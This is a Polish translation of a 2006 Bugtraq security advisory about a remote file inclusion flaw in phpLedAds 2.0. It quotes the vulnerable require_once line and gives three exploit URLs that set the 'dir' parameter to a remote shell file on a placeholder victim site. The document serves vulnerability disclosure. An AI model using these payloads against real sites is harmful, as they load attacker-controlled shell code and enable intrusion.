|
Polskie tłumaczenie bugtraqu
| Przetłumaczył: | kiero | | Temat artykułu: | phpLedAds 2.0(dir) Włączanie zawartości pliku | | Źródło: | http://www.securityfocus.com/archive/1/449928/30/0/threaded | | Podatne wersje: | 2.0 | | Data publikacji: | 2006-10-30 21:06:34 | | Czytano: | 1240 razy |
###################################################
phpLedAds 2.0(dir) Włączanie zawartości pliku
###################################################
Kod źródłowy:
ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip
###################################################
Podarny kod:_
click.php & ledad.php & ledad_js.php
###################################################
W lini 41 :_
require_once($dir . '/ad_class.php');
###################################################
Exploit :_
http://www.VicTim.com/[ledads]/click.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad.php?dir=Sh3ll.txt?
http://www.VicTim.com/[ledads]/ledad_js.php?dir=Sh3ll.txt?
###################################################
Odkryte przez : Mahmood_ali
###################################################
Specjalne podziękowania :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM &
WwW.Tryag.CoM
################################################### |
|
|
